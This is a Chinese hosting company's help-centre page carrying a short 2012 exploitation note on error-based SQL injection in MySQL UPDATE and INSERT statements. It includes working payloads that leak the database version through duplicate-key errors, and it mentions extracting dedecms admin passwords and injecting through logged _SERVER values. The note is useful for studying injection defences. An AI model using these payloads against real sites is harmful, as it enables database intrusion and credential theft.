香港虚拟主机
本站公告
新闻资讯
虚拟主机帮助
域名帮助
服务器帮助
邮箱帮助
建站帮助
网站推广帮助
VPS帮助
特色主机帮助
网站备案专题
会员帮助信息
代理帮助信息
成功案例
我司获香港虚拟主机排行榜十…
香港虚拟主机金秋促销活动正…
百度整治给SEO带来了新的希望
百度同时收录网站带WWW和不带…
百度对原创内容的判断标准 如…
如何建设网站 网站建设三步曲
如何挑选老域名 老域名有那些…
域名常见故障与分析
虚拟主机基本参数介绍
交换链接的技巧 谈一下选择交…
您现在的位置: 江南数联 >> 帮助中心 >> 服务器帮助 >> 正文

update和insert报错SQL注射利用笔记

  作者:admin    来源:本站原创    点击次数:29     更新时间:2012-9-12 7:11:09  
     
 
关注石头有礼
 
 

update和insert报错SQL注射利用笔记

以MySQL为例,有时候运气好的话update类型的SQL注射可以直接将我们需要的内容更新到我们可见的字段里.这样比较方便,比如这篇文章提 到的dedecms的注射爆管理员密码的漏洞,期间我还傻傻的写了个小程序盲注来着,后来发现没必要,可以直接把密码字段的内容放到用户名里显示出来.有 时候运气不好,那个字段内容显示不出来的话,恰巧能输出mysql错误信息,也可以利用报错注射.
update 类型爆错注入
update web_ids set host=' www.2cto.com ' where id =1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (version())),1,62)))a from information_schema.tables group by a)b);
ERROR 1062 (23000): Duplicate entry ’15.1.41-3ubuntu12.10‘ for key ‘group_key’
insert 类型报错盲注
有的比较猥琐的网站会记录访问者的ip地址,浏览器信息等等到数据库里,
有些_SERVER变量不受魔术引号控制,或者我们可以覆盖_SERVER变量的话,这类漏洞就可能发生.
但是一般情况下数据只会才后台显示,不会在前台显示出来
这类漏洞运气好的话,也可以报错注射,运气不好的话就延时盲注猜解吧.
insert into web_ids(host) values((select (1) from mysql.user where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (version())),1,62)))a from information_schema.tables group by a)b)));
ERROR 1062 (23000): Duplicate entry ’15.1.41-3ubuntu12.10‘ for key ‘group_key’

本章关健词:江南数联 域名注册 海外虚拟主机 G享虚拟主机 国内虚拟主机 企业邮箱 网站建设 自助建站 400电话申请 微聚商

 
  版权申请:update和insert报错SQL注射利用笔记出自江南数联dns06.com未经授权请勿转载!  
 
  • 上一篇帮助:

  • 下一篇帮助:
  •  
         

    扫一扫关注公众号有礼
    Copyright@2004-2015 江南数联 版权所有未经授权请勿复制!
    《中华人民共和国增值电信业务经营许可证》ISP证编号:皖B2-20080036 湘B2-20160056
    公司全称:永州石头网络技术有限公司(运营部)
    地址: 中国·湖南省永州市育才路158号 服务热线:400 616 9260
    安徽公司:安徽仁科信息技术有限公司 地址:合肥万和新城广场A-608 
    关注词:网站空间虚拟空间空间域名域名空间域名主机网站空间哪家好网站空间多少钱